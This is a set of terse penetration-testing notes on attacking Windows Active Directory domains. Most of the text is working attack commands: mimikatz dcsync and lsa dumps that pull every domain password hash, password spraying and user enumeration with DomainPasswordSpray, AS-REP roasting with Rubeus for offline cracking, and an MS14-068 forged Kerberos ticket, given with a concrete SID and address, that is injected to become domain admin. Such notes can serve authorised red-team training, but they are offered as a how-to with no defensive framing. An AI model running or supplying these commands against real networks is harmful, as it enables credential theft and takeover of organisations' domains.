intra-domain attack
kerberos attack
Use golden ticket + dcsync to get password
-
Get the Golden Ticket First
-
get password
lsadump::dcsync /user:用户 /domain:域名称
success
Domain user, password enumeration
user enumeration
-
import first
Import-Module .\DomainPasswordSpray.ps1
-
then execute
Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
result
view userlist
password spray
-
implement
Invoke-DomainPasswordSpray -Domain domainname -Password Passw0rd@ -OutFile pass.txt
That is, use Passw0rd@ to compare with the user password in the domain, and return if successful (a bit tasteless)
ASREPRoast
The ASREPRoast attack looks for users who do not require Kerberos domain authentication. This means that anyone can send AS_REQ requests to the KDC and receive AS REP messages on behalf of any of these users. The last type of message contains a block of data encrypted with the original user key, which is derived from its password. Then, by using this message, the user password can be cracked offline.
use
-
get hash
Rubeus.exe asreproast /format:john /outfile: hashes.txt
This command will store the extracted hash value in a txt file in a format that John’s tool can crack
-
Then you can use john to crack
Intra-domain privilege escalation
MS14-068
Prerequisites
- Unpatched (KB3011780)
- a domain machine
- has its sid and password
use
-
Generate a fake certificate
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
demo
-
get sid
whoami /user
-
mimikatz grab domain password
catch if you don't know
-
Generate fake kerberos certificates
MS14-068.exe -u [email protected] -p user2008. -s S-1-5-21-1031516656-1656020465-3194443236-1140 -d 192.168.95.10
-
Loading with mimikatz
kerberos::ptc xxx.ccache
Injected successfully
Elevate to domain admin user
In 2012, the reappearance was unsuccessful, but it was more effective in 2008
Domain hash capture
Assume that you have obtained domain administrator rights
tool mimikatz
There may be a lot of data, so save a log first
log
Then
lsadump::dcsync /domain:<domainname> /all /csv
I don't know why there are missing parameters, you can also use the following
lsadump::lsa /inject
You can also use the domain_hashdump module of msf